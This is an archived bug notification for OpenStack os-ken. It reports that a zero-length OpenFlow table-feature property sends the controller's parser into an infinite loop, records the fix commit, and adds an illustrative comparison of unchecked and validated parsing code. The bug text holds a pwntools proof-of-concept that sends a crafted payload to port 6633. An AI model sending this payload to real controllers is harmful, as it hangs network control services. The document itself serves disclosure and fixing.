
yahoo-eng-team team mailing list archive

[Bug 2067970] Re: infinite loop

 

Reviewed:  https://review.opendev.org/c/openstack/os-ken/+/922622
Committed: https://opendev.org/openstack/os-ken/commit/2f30f44406535991ec982608d04c8893b8fda9ad
Submitter: "Zuul (22348)"
Branch:    master

commit 2f30f44406535991ec982608d04c8893b8fda9ad
Author: elajkat <lajos.katona@xxxxxxxx>
Date:   Thu Jun 6 12:34:03 2024 +0200

    Raise ValueError in case unpack_from returns zero length
    
    Closes-Bug: #2067973
    Closes-Bug: #2067970
    Change-Id: If3327be6c0a4c25173473fb8879d111544d77af5


** Changed in: neutron
       Status: In Progress => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/2067970

Title:
  infinite loop

Status in neutron:
  Fix Released
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  in /os_ken/ofproto/ofproto_v1_3_parser.py about line=5269

  ```python
          while rest:
              p, rest = OFPTableFeatureProp.parse(rest)
              props.append(p)
          table_features.properties = props
  ```

  The rest variable here is obtained through the following code:

  ```python
          (type_, length) = struct.unpack_from(cls._PACK_STR, buf, 0)
          rest = buf[utils.round_up(length, 8):]
  ```
  If the length variable is tampered with and set to 0, rest will receive the original buffer, causing the controller to fall into an infinite loop.

  poc:
  ```python
  from pwn import *
  p=remote("0.0.0.0",6633)
  payload="\x04\x13\x00\x58\x00\x00\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x0000\x48\x01\x00\x00\x00\x00\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00"
  p.send(payload)
  p.interactive()
  ```

  This problem also occurs with the following code:
  /os_ken/ofproto/ofproto_v1_3_parser.py about line=5269
  /os_ken/ofproto/ofproto_v1_4_parser.py about line=1789
  /os_ken/ofproto/ofproto_v1_5_parser.py about line=2029

  Can I ask if this can be used as a vulnerability and assigned a CVE
  number?

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/2067970/+subscriptions
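
The loop pattern from the bug description next to a length-validated form, as an added example that is not os-ken code and not the committed fix. The function names, the `!HH` header layout and the sample buffers are assumptions made for illustration, and the checks go slightly beyond the zero-length case named in the commit message by also rejecting a length shorter than the header or longer than the buffer.

```python
import struct

# Assumed TLV header: 2-byte type, 2-byte length (big-endian), matching the
# (type_, length) unpack in the bug description. All names are hypothetical.
_PACK_STR = "!HH"
_HDR_LEN = struct.calcsize(_PACK_STR)


def round_up(n, align):
    """Round n up to the next multiple of align."""
    return (n + align - 1) // align * align


def parse_prop_unchecked(buf):
    """The pattern from the report: the length field is trusted as-is."""
    type_, length = struct.unpack_from(_PACK_STR, buf, 0)
    return (type_, buf[_HDR_LEN:length]), buf[round_up(length, 8):]


def parse_prop_checked(buf):
    """Reject any length that cannot advance the cursor or overruns buf."""
    if len(buf) < _HDR_LEN:
        raise ValueError("truncated property header")
    type_, length = struct.unpack_from(_PACK_STR, buf, 0)
    if length < _HDR_LEN:
        raise ValueError("property length %d shorter than header" % length)
    if length > len(buf):
        raise ValueError("property length %d exceeds buffer" % length)
    return (type_, buf[_HDR_LEN:length]), buf[round_up(length, 8):]


def parse_props(buf, parse_one, max_iter=1000):
    """Drive the `while rest:` loop; max_iter exists only to bound the demo."""
    props, rest, n = [], buf, 0
    while rest:
        n += 1
        if n > max_iter:
            return props, False  # the loop never consumed the buffer
        p, rest = parse_one(rest)
        props.append(p)
    return props, True


# Constructed sample input: one valid 8-byte property, then one whose
# length field is zero.
GOOD = struct.pack("!HH4s", 0, 8, b"\x01\x02\x03\x04")
BAD = struct.pack("!HH4x", 0, 0)
```

With the unchecked parser the zero-length property leaves `rest` unchanged on every pass, so only the demo's `max_iter` guard ends the loop; the checked parser raises `ValueError` on the same input, which the caller can treat as a malformed message.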